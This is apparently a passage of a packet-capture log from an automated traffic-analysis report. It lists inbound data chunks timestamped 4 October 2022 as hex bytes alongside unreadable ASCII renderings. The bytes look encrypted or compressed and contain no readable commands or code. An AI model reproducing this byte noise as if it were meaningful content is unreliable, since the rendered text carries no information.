                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3031INData Raw: f4 23 52 92 a9 94 9a 2f 66 2a 1d ec 65 20 34 7d 88 43 d1 a3 a7 aa 6d 73 4b 2c a7 a4 08 82 c4 b7 ca 52 93 8e 23 df ce 95 f4 ee 4c a2 c4 28 d2 1c be 00 47 eb 5f 31 d0 04 bf d1 e6 28 a4 08 37 b6 45 f3 0e 02 3b 0b e3 92 65 89 dc 11 24 3c f3 08 7f 2c ee cc 42 92 2f 32 21 a7 ce d5 1d fb fa 15 3b 00 0b af a8 10 55 62 a3 ea c8 20 ec 0d 76 74 c8 6c fc 06 6f 51 92 22 f7 ac 05 1b 14 bc 42 83 a0 e8 1c 59 23 c6 4b 55 43 45 30 2f 75 62 51 f6 df 57 cc 08 89 e9 66 5c 4a 8d 13 1d 5f 1f d0 d2 08 90 a9 25 b9 b2 c2 3b 82 56 1e 4d c5 91 b4 fb e0 9b f7 23 cb fb c9 80 4f da 7d d7 8c de 96 0d 07 14 80 8c 89 48 18 8d a3 b0 8b d5 40 7d ac b6 e7 1f 06 75 8f be d8 99 88 4e 62 08 0a 41 31 b9 5c 59 c9 b0 f2 6f 67 d7 2a 25 35 28 97 4f 3b 4d 1d 62 7a 66 3b 84 b2 a3 54 1f de 39 3c 55 c1
                                                                                                                                                                                                                                    Data Ascii: #R/f*e 4}CmsK,R#L(G_1(7E;e$<,B/2!;Ub vtloQ"BY#KUCE0/ubQWf\J_%;VM#O}H@}uNbA1\Yog*%5(O;Mbzf;T9<U
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3047INData Raw: 8c a8 2b 59 83 ab a9 69 52 74 7b 90 a7 14 61 85 45 2d 98 42 23 22 23 20 69 9f 1b 9c 7a 7e ac d7 01 c5 b1 c3 33 05 b2 e7 fc e0 c7 1b 2e b0 ee d7 6f 44 a7 7b be e1 b8 41 8d 5b d1 b4 45 4b c4 78 97 da ff e7 d2 33 cc 14 b1 b0 00 03 f1 5f 9e 39 0f 73 b1 d1 33 db 4a 9b e0 6a 00 d5 33 1a 6c c3 22 da 9b 1d be 38 de f3 6e 9f de 63 62 70 e8 36 ba 1d 88 77 b8 7c 49 bc de 9e 14 ee ff 0f 0c d3 ab f7 66 5a a9 16 bf b6 41 3a 6d 28 0d d1 29 6b 17 e2 f3 9a c8 94 5c 9d 24 05 1f 02 f5 bc fb c3 80 9a 1e 3e 09 9b 3f e0 7f 5a 29 85 82 59 df d0 3e 10 86 96 c4 cd 42 ac 4b 51 fd 3e 71 b9 e4 99 91 15 5e 25 7b 0c d6 cd 84 e2 26 88 c0 43 e7 1c a3 88 c8 bb da 2c 16 c3 66 ee 5f c3 d6 69 f0 45 b4 a8 5f 3c 2c 2b 5a eb ea 81 48 52 f6 92 a6 12 7a 12 c1 b5 55 e4 0e 33 66 6e c1 e6 54 54 8d
                                                                                                                                                                                                                                    Data Ascii: +YiRt{aE-B#"# iz~3.oD{A[EKx3_9s3Jj3l"8ncbp6w|IfZA:m()k\$>?Z)Y>BKQ>q^%{&C,f_iE_<,+ZHRzU3fnTT
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3063INData Raw: b7 51 0a f6 6d e7 e5 31 5d a0 c5 ee 44 f4 04 fe ec 49 a4 b3 01 45 91 3f aa e7 94 32 26 2e 19 f2 26 2c 8a 5e c6 86 d5 cd 2e 04 ee ff be 2e af 9c b8 72 b9 6e 77 9a e1 a4 35 7c 66 4b bc 1e 4c ed 31 10 1a 7e 4b a4 79 fd bb 67 a8 b7 3a 29 64 63 3b 0c 03 72 cd c9 ac 88 ca 1e f7 2e 06 00 96 b8 e2 9b 3e 13 2b 7f 49 44 ad 7d 43 f5 16 be 86 87 3c a5 70 25 f9 07 8b ed 84 08 fa f2 3e c9 d2 aa 94 78 e3 63 eb a4 29 99 29 54 90 a5 00 be 54 7b 33 cc f3 8a 7b a4 bf 9a 16 95 77 31 31 bb 3f a0 1c ee 5e fc 9d 0f 0f 66 43 66 f0 f6 f3 0e 13 6d 84 cf 3d aa 20 37 1b fc e0 74 fc 1d 1f 05 eb cb e7 bd 3b f6 7e 92 87 f0 76 fb 5e fa a9 b6 cb 2c 37 e2 5b 05 b3 45 66 64 5e 67 05 53 d0 7f 88 b0 8f e5 07 c9 93 0a 09 5d ae 9c aa 02 f0 9a a2 a8 3d 98 d4 d1 f2 a1 0e 8a de 1e fb d9 8b 61 85
                                                                                                                                                                                                                                    Data Ascii: Qm1]DIE?2&.&,^..rnw5|fKL1~Kyg:)dc;r.>+ID}C<p%>xc))TT{3{w11?^fCfm= 7t;~v^,7[Efd^gS]=a
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3079INData Raw: 81 51 70 62 93 95 e1 ce 1e b4 01 39 76 22 8c fa 1a 2c fe f0 be fa 1a 85 d1 15 83 38 21 3d 2f 6a 38 9b 12 5c 46 3e 58 84 8a 37 14 3e a4 18 93 a2 1c f8 49 67 f0 3f 99 22 31 b0 4d fd a4 c0 20 b7 5e 0b e1 44 f0 ef f7 37 23 28 76 67 96 55 08 53 c9 01 2a 08 3c 9b 23 94 3d 4c f7 aa cd 4d 82 23 42 5a 01 e4 c5 81 c8 d1 b7 32 95 58 36 ce b0 0a a7 cd d8 40 b7 d2 6b dd be 43 97 13 94 31 0b 5d fb 87 f8 a2 b8 89 99 b3 43 09 06 47 c6 d8 f4 d1 76 3f 95 06 2d a3 9b a9 84 4d 93 65 01 72 33 5a 0f 35 1b fa 8d c0 11 4a 72 49 c6 34 ff 2d c7 15 1d a5 57 b7 1b 01 09 cb 7b 71 90 e0 41 a3 7f b4 8f 93 c0 29 3c b4 4d 1b 38 3c 00 f9 e2 9c 91 6e 72 93 ab 25 36 7b 4d 33 a1 e8 a5 99 2b 36 84 77 bc a9 67 c6 14 7c f3 45 d7 48 f3 90 87 29 47 42 63 b2 f4 1b 91 0c d8 7a a0 97 00 5e be ea cb
                                                                                                                                                                                                                                    Data Ascii: Qpb9v",8!=/j8\F>X7>Ig?"1M ^D7#(vgUS*<#=LM#BZ2X6@kC1]CGv?-Mer3Z5JrI4-W{qA)<M8<nr%6{M3+6wg|EH)GBcz^
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3095INData Raw: ad e0 54 4f a4 c0 19 bd b6 d3 2c a8 bc 5b a1 92 0b ed bf 61 24 0b 1e bb dc f6 a4 2e a1 ab 98 75 0f b9 1a 2a 8b d8 85 78 7d 7b 0c 01 e7 b6 73 8b 5a a5 ea 30 d5 a7 fb e1 4d 76 94 e3 26 cc eb 16 70 1c c4 d9 ab 08 19 00 ea 99 0c 55 64 64 0a 94 83 fe d9 0e c4 dd 4c 74 50 dc ac bf 51 85 ad a6 54 67 1d 1e dc 18 5e c8 7a 17 3e 7a 3b 8a fa e2 c4 2c c2 7d 4a 82 0f b9 43 06 bc cd 40 da 1c f4 3f c0 4a 33 2f ab 91 15 8e e7 45 7d 5b c0 f5 36 91 41 52 d3 40 6a 91 6b 99 0a a3 e0 b7 c7 e7 54 3d 35 77 84 95 66 40 60 e2 07 1a 0f 66 6f 2a dd 7a ba 1b 65 3e d6 5b 03 5c ff 26 28 74 2d d2 a1 b5 69 9a ba ac 34 7a b3 e8 dc 52 a2 d4 73 d3 bb 11 e9 73 5d 7d af 35 b2 96 0e cb be 5e 14 89 eb bd 54 9c 6b 3d 6a f4 c5 e8 43 d1 8c db f8 39 78 d0 82 5a a3 a5 a5 c1 23 f8 a6 25 0c b6 0f 42
                                                                                                                                                                                                                                    Data Ascii: TO,[a$.u*x}{sZ0Mv&pUddLtPQTg^z>z;,}JC@?J3/E}[6AR@jkT=5wf@`fo*ze>[\&(t-i4zRss]}5^Tk=jC9xZ#%B
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3111INData Raw: 98 88 ae a7 42 a3 7d 6e 39 61 91 fc 47 fa 10 fd 65 12 4b a3 1e cb cf c6 0f fa 77 3f a2 ab d4 35 b2 ec 11 20 31 02 ee f6 fe 84 2a fb 29 5f e2 e8 ea 97 71 64 db e7 d1 8f c1 b3 5f df 77 33 cd 89 6f 3a f3 e2 3e 5a a7 a5 f3 ae 39 07 36 37 c9 13 9e ae f3 67 c0 46 30 64 25 d1 16 dd 0f 45 ff 92 13 7b 92 0e 50 cf 04 d9 e5 50 95 fb c6 e3 1f d4 e9 29 3a 3e 03 fe 3e 3d e6 c3 5f d3 84 23 96 75 e7 e7 ac 6e 32 8a 94 22 5a 5e 9d e0 dd 31 c7 9a c0 dc ae ca 18 dc ec 89 d1 b5 4e d3 ad fe 4c bb 6f 71 02 84 e7 e9 9a 42 e6 f2 97 30 33 fe 95 2e 35 c4 e4 ff 4e ae 85 cb 70 2f 79 ab 77 6f a3 f0 30 26 4c 89 c9 44 89 da e3 0c 75 80 ae 5a 85 e6 39 ef da 95 bb 3f d4 8a 61 8c f3 19 54 4d 74 38 58 ae 57 e8 01 09 80 be fe a5 9f 5c d2 63 94 65 0f 42 fb 12 5f 4f 51 77 7a d7 ee 7d 33 59 7c
                                                                                                                                                                                                                                    Data Ascii: B}n9aGeKw?5 1*)_qd_w3o:>Z967gF0d%E{PP):>>=_#un2"Z^1NLoqB03.5Np/ywo0&LDuZ9?aTMt8XW\ceB_OQwz}3Y|
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3127INData Raw: ad 86 78 c5 a7 2c e1 ae e3 19 20 72 01 9d 62 52 3e 57 36 ce cb d0 5f bb db f0 cf 5e 19 99 1e 86 ee fc 67 ac dd e0 c4 18 29 40 d0 72 79 5b 99 82 a4 00 0a 17 33 35 a8 3e ab ff 42 48 f2 20 61 1c a5 14 f3 e3 29 f1 11 aa cc 66 f1 6f 7b 30 ba 78 2a a5 30 4e 65 82 34 0b e6 f6 27 0e c0 3a d0 59 35 aa 5d 81 01 c6 f3 93 fb 65 34 b9 3a 74 10 84 ba d1 ea 90 f5 9e b7 de 49 ea 7d d1 e4 0e 96 25 99 5e 0f ad 70 9b 0b 8c 25 ef 49 86 4a 57 44 4e b0 5e 09 f3 a4 5e 09 9c 01 99 f8 91 04 66 71 1b 2a 56 e6 85 1c 97 91 32 79 e3 f5 af e6 31 e7 e5 d0 dc 2c 96 25 d1 b8 6a 80 fd af 1a 4f c6 6b f0 07 86 5d e9 74 7e 42 f1 36 22 e4 d4 fd b9 a0 3f e8 14 63 d3 d5 eb 17 26 c9 55 7e 18 99 d8 17 bf 2a 46 36 0e f6 96 ea 2e 3e 67 df e6 9f 2a 1f ad a5 ef 33 e7 4c 44 43 c2 bf 4b b8 b0 cd a5 b5
                                                                                                                                                                                                                                    Data Ascii: x, rbR>W6_^g)@ry[35>BH a)fo{0x*0Ne4':Y5]e4:tI}%^p%IJWDN^^fq*V2y1,%jOk]t~B6"?c&U~*F6.>g*3LDCK
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3143INData Raw: 05 37 58 31 c3 64 d5 52 ca b4 57 3c 51 37 17 a7 0c b7 71 46 69 1f cd 2f d1 cf f8 65 36 54 72 8d b7 57 f3 9f ba 45 c9 c3 bf 4a 6c e3 8a 1a 64 8d 74 1c 70 aa 2e 45 6d 87 23 0a 05 85 ab 55 26 07 25 bc d2 2d a3 7c 59 a3 38 7d 35 8c 19 2d f5 7d ff 64 20 28 7e 1f d5 97 2f a4 f2 85 0f 0e 5e 72 ac 63 6d 56 25 a0 05 b6 46 66 71 ef 28 7d 09 f8 61 18 08 1b ac ef c6 d7 4a ec cb b5 b3 51 7b 92 4f 12 9b 5a 65 e5 ae ec df 17 fd ef c1 12 8b 45 a6 5a 33 f7 a7 6f 5a 77 d4 2c 98 de f6 81 b5 74 df 83 51 aa 6e 6e ed 9c 32 b5 f8 c3 39 58 08 5e 9a 8e 92 c6 6e 7c ad d4 2b 27 d6 7b b9 dd 01 2a cb 5d 1a 85 6e 35 f7 ac 2e 50 56 33 1c a6 f9 d6 e2 48 05 72 50 5a 38 82 a3 f9 66 8c 10 13 b3 36 4b 81 b5 f3 da 14 36 4c 53 0a 04 92 6a 20 d8 7b 33 4e d6 c4 66 e4 d1 41 00 83 37 b9 9b 6d 33
                                                                                                                                                                                                                                    Data Ascii: 7X1dRW<Q7qFi/e6TrWEJldtp.Em#U&%-|Y8}5-}d (~/^rcmV%Ffq(}aJQ{OZeEZ3oZw,tQnn29X^n|+'{*]n5.PV3HrPZ8f6K6LSj {3NfA7m3
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3159INData Raw: 7e b7 96 f9 80 44 44 de 31 e3 0b 34 bb 86 2a 26 fe 1c f2 9c 32 8e 80 5a be 91 0a 7f ea 2b 68 1e 0d 89 79 a5 a4 de ec d7 e7 10 a9 ef 38 da 6d b2 60 cc 83 36 cd 21 99 20 af 37 6c f9 63 b6 1c ca 6d 00 5a 77 6a 34 e9 0a e8 e8 90 4c b8 1a 5f 93 9c 56 ad 54 0e c5 bc f5 85 05 93 48 d4 33 a1 17 89 d6 0a c1 86 ef 3a 20 36 f1 27 63 43 d5 4c b1 e3 4f 15 59 67 75 14 cc ae d1 22 3b e6 e7 5b 3c bb 7c de 8f 9d 34 fe 82 21 ce 39 46 70 af d1 0f bb d8 d1 1b be 6b 9b 77 d2 1f a7 0f 97 ef 55 91 51 bc 15 fb af 51 b2 a2 af e1 87 72 74 fa f5 96 89 83 1a bd 1a c7 92 b3 f5 b9 31 f5 ee a2 9c 40 4d 86 4d 65 ac 1d c1 a6 ef 11 b8 b3 9a 6e f7 17 56 65 e2 c4 fe 32 60 59 66 5f 5a 54 cd 82 50 0c ae 74 6d af 1e d2 43 25 dd 88 4a ff 9d 83 10 5a b9 24 d3 b2 f3 d5 b2 ca 8f b9 c8 dc 7b 4a 1c
                                                                                                                                                                                                                                    Data Ascii: ~DD14*&2Z+hy8m`6! 7lcmZwj4L_VTH3: 6'cCLOYgu";[<|4!9FpkwUQQrt1@MMenVe2`Yf_ZTPtmC%JZ${J
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3175INData Raw: 23 e2 e4 e0 06 20 b0 bc 92 47 37 fb 6c 56 3d 3d 20 b8 bf 26 0a 50 c0 9c 4e 4c 8a 91 ec 71 d3 ee a5 02 89 fe eb 54 1c bb 51 b1 7b 62 02 25 63 fc c1 ee 97 81 8f e9 36 50 ab 55 21 9d 84 ba ee c0 d5 e7 3d f7 d5 c6 3d a9 9a ab 83 b8 4c 10 45 40 a7 c7 1f 50 64 84 bb 08 35 3e 39 2f da df ba f1 8c 70 df 71 04 a1 bc 8b 83 ca c4 20 de 57 7c ff af 8e 53 ea 65 4f f3 22 20 2e 72 eb bc 20 06 26 0f 39 20 2c 7d c3 fb 09 31 fb eb d6 c9 0a 32 27 76 d7 38 60 03 8f 4c 4f a8 0c 43 2b 14 bc d4 76 18 f2 68 c1 fd 78 29 6b be 44 2f b4 cb 66 b1 8e b2 bc 2a 92 c8 82 1a c7 71 16 65 0c 91 94 8a a6 8b 00 3a 30 0b f0 d7 fb 03 be b3 d6 4d ec 7c a8 71 8e b2 d7 d3 f5 92 0d f0 c3 67 9f db 32 f9 fe 3d ec 56 37 ee 5c c4 fd 0b 6b 50 29 1a 86 b9 ad e0 a4 d4 0d 97 fa 45 6a 1c 56 2c 8a ad 5b 91
                                                                                                                                                                                                                                    Data Ascii: # G7lV== &PNLqTQ{b%c6PU!==LE@Pd5>9/pq W|SeO" .r &9 ,}12'v8`LOC+vhx)kD/f*qe:0M|qg2=V7\kP)EjV,[
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3191INData Raw: 41 2b 0b 37 52 13 d8 b2 d0 e7 39 a5 24 94 96 aa 73 03 d2 f5 65 7d 0a 89 c9 5f 7f cf 28 e8 7d 30 b7 83 3c 14 8a 3c 33 d2 25 f8 e9 3a 0c b6 78 75 7d ba 1c fa 18 f5 f8 db 3a 4f 5b df fa 1c 14 2a e2 dc 98 be e7 87 f1 bf 75 17 2a c1 36 e3 38 de 0e 3e 4c a2 b4 a4 fe a4 b9 b7 cb 0a b1 da de 08 15 ab ae 30 30 b8 a0 58 32 95 88 d0 34 c5 b5 9e 67 f9 8f cb fa 68 d3 38 02 b6 c2 18 45 d7 7d 29 22 6a 9b 16 9a 61 5e a7 06 34 15 17 fd 7b a1 84 2f 06 7b 99 50 3e e4 84 92 07 82 1e f8 46 fc 0d 05 27 8c f2 65 55 7e 9b 9a 17 4b c5 bc 92 21 4d b8 28 61 4f 17 ea f7 db bc 38 a0 1e d1 3f a2 ad 1e bf e0 dd 3a 4a 34 7e f5 12 a6 ea 97 55 5e 18 b5 f6 bf f9 40 e9 2c 00 c0 59 f0 12 75 7d 6d 01 d0 61 6c 3e e3 fc be 43 0a c0 73 f7 8e 42 fb 24 31 e6 23 af 3d 7f 67 58 db 1a 1b 54 4b 90 fe
                                                                                                                                                                                                                                    Data Ascii: A+7R9$se}_(}0<<3%:xu}:O[*u*68>L00X24gh8E})"ja^4{/{P>F'eU~K!M(aO8?:J4~U^@,Yu}mal>CsB$1#=gXTK
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3207INData Raw: 71 a9 7a 7c 73 59 6b 09 83 ed b3 ee 09 a9 75 4f ff be e3 de 04 14 a9 0c 53 47 c9 0a d6 50 48 78 0a e0 fd e1 63 6d 20 eb 61 8d e8 1e 8f 07 87 b5 7a 78 9f 69 61 47 aa df a2 1b d5 3c e4 29 2c 51 d8 8c 4a 07 af 0b e6 c0 cf e7 0d 75 92 92 6d 6b f9 58 92 ec 2d f3 6e cc dd 4b b2 c5 fa 04 d9 b1 b7 06 ae b7 5f 33 9d 8b a5 a3 2e 77 e3 2f 76 08 20 fc 9c d8 e8 f3 5c 72 b5 fd 5d e2 b5 41 ed 18 af b3 3c 62 74 79 a8 8a 7b 56 0e 13 d2 8b 76 a7 88 42 85 ee 06 cf b2 18 77 6a fe 0e eb d6 5a 96 5a 82 e4 c7 8c 5a 1e b2 28 4f 0a da bf ba ff af 52 63 17 ab 4c c2 4c 5e 2c e2 44 4b 67 98 a5 d0 4f a3 32 38 86 80 43 09 ff 56 81 66 d1 6d 19 e7 9b d3 f2 28 72 c8 f5 95 c7 84 46 db b4 0c 74 52 44 4d 6b 2e 98 96 7f a3 83 f4 48 ab 0d 29 cf 59 30 e5 f1 c2 d5 ab 8a e3 67 7b 35 c7 c2 bc 73
                                                                                                                                                                                                                                    Data Ascii: qz|sYkuOSGPHxcm azxiaG<),QJumkX-nK_3.w/v \r]A<bty{VvBwjZZZ(ORcLL^,DKgO28CVfm(rFtRDMk.H)Y0g{5s
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3223INData Raw: 3a da 31 33 a4 9a d5 38 cf 71 a3 3b 85 fd 7c 74 d2 86 ef 2a 97 f0 c3 78 11 6b 1c 2b 17 a6 cc 49 82 d1 f5 95 37 a7 be 06 56 6c 2d bb f6 d9 ec 06 71 b9 2f 30 71 56 85 db ef 26 63 5a 7b 16 bf df 04 0a 04 c5 c4 11 06 c3 7e 31 e7 77 54 c6 ec 4c da a5 64 96 03 06 76 f4 54 6a 83 18 8a 0d e6 68 5d 2b 68 f3 6f 1a 11 70 c3 7f 13 0b 08 6b 29 89 87 cd 3a 65 92 42 2e 5e 83 77 fc a0 e7 39 b6 ee 7b ed eb 0c 03 bb a2 1b d2 d3 e9 08 45 9f 60 31 ad 54 78 b2 9f f2 7f 29 6a 83 ef c6 23 16 6e d6 91 20 07 61 8d 9e 45 a5 f0 9d 33 e3 14 4c 7f e7 29 c9 c4 d9 4a 60 e3 15 a1 6f 0d 6d 2b 22 a9 a3 fe ef be ad 65 75 9f b6 c4 4d 6b ef 79 12 a8 d1 76 ae ac fa db 9f 30 ff 7b 9d 7d f2 e5 08 e6 1a 23 f4 84 1b af f8 5f a0 a8 6f f4 78 a5 26 4d 82 4a e7 14 da 1c a3 f8 85 14 36 33 da 60 f4 27
                                                                                                                                                                                                                                    Data Ascii: :138q;|t*xk+I7Vl-q/0qV&cZ{~1wTLdvTjh]+hopk):eB.^w9{E`1Tx)j#n aE3L)J`om+"euMkyv0{}#_ox&MJ63`'
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3239INData Raw: de c9 45 fa ac ad ff f7 1c 95 89 18 ef 7a 55 42 9f 88 4d d3 4f 19 d6 75 9c c3 6b 8f 73 a5 76 26 fd 43 cb 5c 5b 06 8f db cc b5 2a 5b a2 ab 9f 67 e1 6c ad 32 16 af de 95 62 9c ed 3e 02 50 bc df 99 76 87 39 eb 17 77 b8 45 35 55 68 6e 53 23 bb 8f 0b f2 84 1d f8 e0 3d 51 83 bc a9 f0 d4 9a ab a2 b7 df 01 6e 9e 57 2c 45 b8 cd 75 8b de eb 2d 1d 20 e4 9f a4 d3 9d 27 60 17 65 d3 b6 69 ec 80 97 60 62 58 e4 13 77 7f 0f 6b fb 75 a3 f2 68 78 3d 26 8a c9 3c 2b 87 f2 41 e2 02 ed cb 9b fd 99 03 9f b8 2a b0 1b 60 33 56 18 06 3b b5 bf 59 6d 65 db 58 40 7d 10 c4 e3 4b 40 a4 e8 df d0 4f 7c 5d 1d cd a6 29 ef 8b 11 cf 87 f0 9f 97 30 a6 95 ff e0 04 13 1c 89 21 39 f3 9f f9 93 21 91 1c 7b 8c 79 d6 10 1f 96 e5 38 be 5e 04 10 10 de 53 4f 5d ba 97 c5 92 47 45 38 d3 00 e0 34 24 71 df
                                                                                                                                                                                                                                    Data Ascii: EzUBMOuksv&C\[*[gl2b>Pv9wE5UhnS#=QnW,Eu- '`ei`bXwkuhx=&<+A*`3V;YmeX@}K@O|])0!9!{y8^SO]GE84$q
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3255INData Raw: 41 6b 27 86 05 67 30 43 0b c9 c8 aa 8e 61 f8 86 1b 0a db f4 ae 74 5b 20 5e 77 c3 44 7e 51 bb c9 b2 bd 1b 10 ba 8f e0 07 04 49 65 75 50 3d 02 60 93 78 13 5e 43 33 a7 e6 a4 d8 ae 7d 6b 29 7d c9 11 99 a5 11 82 07 79 92 d2 00 b5 8a 3b 35 05 4d fd 33 63 ec e7 00 f6 e9 8e 53 44 e9 0c b8 91 03 42 df b1 a4 32 41 4c 06 3e 72 02 e9 11 4a 71 c4 0b ad 34 25 62 63 44 87 11 32 36 44 f2 f2 0a fb c4 50 ac 0c 3f f0 73 6f 6f 81 53 b6 a5 f1 5d 9a d3 db 34 06 60 04 3a 17 eb 43 17 cc 4f 7c 9b 0f a3 cf 84 88 a8 32 89 37 8e 3e 70 0f f4 ff fa a7 f5 b3 2b 89 25 5f a8 76 89 b8 d6 d1 a8 bd c1 11 2c 10 52 b2 ca 6c 0e 9b 90 3f af ee e1 e5 72 ab ae e2 be 8f 15 c4 cd 0a c6 70 3e aa 2b 9f c1 1a 4d ed da 2d 18 72 af 6e ce a9 23 e5 6c 84 a2 27 6e 2e d1 a8 33 8f 4d 74 3a 0e 38 87 4f 5f 28
                                                                                                                                                                                                                                    Data Ascii: Ak'g0Cat[ ^wD~QIeuP=`x^C3}k)}y;5M3cSDB2AL>rJq4%bcD26DP?sooS]4`:CO|27>p+%_v,Rl?rp>+M-rn#l'n.3Mt:8O_(
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3271INData Raw: ae 3a 06 04 30 cb 4f af 37 fd 5e 74 59 ec cb 97 07 5f b0 f9 e7 15 74 fd 12 12 6e 96 5f 59 0b e5 86 08 69 de ef e1 31 eb 2a f3 d7 29 da f9 87 b7 7a 27 cc 69 9c f1 1f 45 fe 18 07 a8 d5 74 b7 5f 7b d7 89 21 11 42 d6 8c a2 a2 94 fa 04 e0 be f2 c5 ba 6d 7a a3 25 67 0e fd 80 5b 33 85 2f 53 f2 b8 3a 6d 14 ca 28 82 c4 6c 9b 70 65 1f 48 c6 64 1d 53 c4 ce 51 87 f6 11 21 4e 86 48 9a d2 9b cc 93 cf 0f bf 65 95 ef c5 63 e3 a3 90 d8 f7 70 3a 27 5c f4 bc a8 4b 27 db 9c b2 33 9d 9c 71 9a 2d 6c a0 5e 6c 73 f5 55 28 66 22 cd b2 c6 30 ce ba 54 0a a1 ff 03 66 85 6e ac 44 19 d1 95 52 6b 12 d8 a1 60 28 35 21 72 9d 4e 52 17 84 09 3b c4 cb 07 5f cf 53 c9 ca 85 11 de 78 6a d1 fa 89 21 52 cc be 2b c0 90 bd c0 95 b8 b0 ff 6d 4c 2f 33 28 41 09 01 ae 7f 6d 43 f8 f1 6f f0 e5 05 71 47
                                                                                                                                                                                                                                    Data Ascii: :0O7^tY_tn_Yi1*)z'iEt_{!Bmz%g[3/S:m(lpeHdSQ!NHecp:'\K'3q-l^lsU(f"0TfnDRk`(5!rNR;_Sxj!R+mL/3(AmCoqG
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3287INData Raw: 88 29 f5 94 7a dd d0 b9 68 96 fe a5 1d 08 1e f1 ca 01 1a e0 2e c2 b3 4b b0 25 17 05 c1 34 2d c7 87 55 cd 09 96 a8 cc d6 5a d0 0c d5 c1 eb b0 32 4a 0c db a9 7c cf dc 97 93 f8 6f 69 f8 70 7d 8f 06 79 0c ec 44 6f 0a d3 cd 51 02 fa e3 d3 5b b9 6b fc 4d 6e fb b2 f4 93 05 5a 6b d8 7f 40 df 77 6b 6c e5 ec 02 27 62 0a 45 ee e4 c1 44 cb 83 46 7b 13 ba 9a ec ec 20 77 ac 77 7a ee 9c e6 f8 1c f6 5d 33 c5 0a ee 88 e6 dc 48 48 40 82 22 a3 18 0d 56 0a 0c 1d f2 f7 3b 62 a5 d9 ac 78 dc e5 95 90 7f 2e 86 cd 4e 83 88 94 28 04 0c 80 d9 e0 ec 84 9e be 9f bf 37 f8 69 65 59 eb 4b b5 f6 e1 58 1a 31 1b aa 1c 8a e2 eb 8c 50 fc 20 37 95 fa 06 ef 1b 52 ac bf f1 de c0 dd b7 f3 a3 70 2e 02 07 7e 57 76 7d 4f c4 fd 7b fb 31 4b eb a9 29 4b 97 7d fa 66 92 97 75 60 91 1a 3e 1e 9c ec 6d a1
                                                                                                                                                                                                                                    Data Ascii: )zh.K%4-UZ2J|oip}yDoQ[kMnZk@wkl'bEDF{ wwz]3HH@"V;bx.N(7ieYKX1P 7Rp.~Wv}O{1K)K}fu`>m
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3303INData Raw: 20 93 f6 8a 8e 43 3c b5 44 26 f1 df 09 09 31 f8 b2 ca 2b 0c f8 c6 d6 26 5b 11 20 a1 c5 02 ed 19 9a 79 36 38 85 16 03 de b1 11 3d 1b 97 8f cb f9 7e cb 94 5d 6b 27 23 a1 fc 66 a8 23 29 51 c5 e3 6d ce 68 7c 72 e5 ef 23 ba 56 49 c4 d5 77 aa 1f 23 77 6f 3c ce ae 4c 60 d1 13 37 83 2b c3 33 8e e5 37 af 43 ee 4d 14 06 f7 b0 ab 20 a9 74 9a 8a 7d 8e 62 92 dd 33 70 0b 5a 6e a6 4f 68 c2 6d 8b db 8c e0 ed 2b c7 f4 a3 15 54 29 26 2d c1 f4 45 f9 48 63 0d 8a 2e 51 95 d0 6d f9 80 05 57 bd 9a 46 52 b4 54 bf e8 47 d9 fa 84 55 29 82 03 b7 0d ed 24 1f 8a 54 e8 65 05 c1 29 be cc 1f 03 76 66 42 fc 58 e3 cd 27 61 38 91 9b ba 95 f2 57 22 15 31 49 ad 5f 66 e3 15 30 d0 c9 17 1e 00 fd 5c e7 ce 41 5e c8 70 ff 9b 7b 74 7f 51 3d 5f a3 21 18 2f ad 2b ee 15 f0 f1 8b c3 c1 94 ce fa db f4
                                                                                                                                                                                                                                    Data Ascii: C<D&1+&[ y68=~]k'#f#)Qmh|r#VIw#wo<L`7+37CM t}b3pZnOhm+T)&-EHc.QmWFRTGU)$Te)vfBX'a8W"1I_f0\A^p{tQ=_!/+
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3319INData Raw: 99 25 41 ae b8 2c 03 7c 35 39 77 71 ff 7d 07 c0 9b 3a 85 38 11 9a 85 48 1d 23 47 0e 98 4e 2d 69 13 f0 b1 40 66 ea 01 53 11 af eb a0 b0 3a c2 2d d7 59 6f 5b c7 80 e4 80 07 8e 9a bb b4 67 22 2f c1 8e 7a b9 b5 65 55 d6 d3 ca a9 fc da 48 20 e0 53 87 4d 25 1d a3 af d7 88 2e 24 30 53 d1 88 cb 1d bc fd ce ff 35 44 e2 09 13 e8 86 09 0a 6e 6b d5 ba f6 da ff ba e8 3d 82 c8 7c 95 0d d2 9f c4 33 de fe 40 2b 3c ae 8a f4 5a 09 bb 14 59 45 35 93 89 c3 60 2d 77 2e eb 20 2c f2 0a f7 51 0d 65 54 6d 13 06 cb 57 b6 7a 55 58 f9 10 5e a2 35 88 74 a5 a2 7f c0 6d 00 d6 94 2a bf 82 5c 05 34 7c c6 b7 0a ff e5 3c a2 be ca e3 e9 e1 37 17 88 e4 c1 93 df ab c8 f5 a8 42 9e a4 95 05 f0 ed 7c 23 f5 f5 6c 59 84 d3 18 19 64 1d d5 ea 16 70 73 38 dd 35 33 fb dc c9 97 06 a0 71 ab 9d fe 81 86
                                                                                                                                                                                                                                    Data Ascii: %A,|59wq}:8H#GN-i@fS:-Yo[g"/zeUH SM%.$0S5Dnk=|3@+<ZYE5`-w. ,QeTmWzUX^5tm*\4|<7B|#lYdps853q
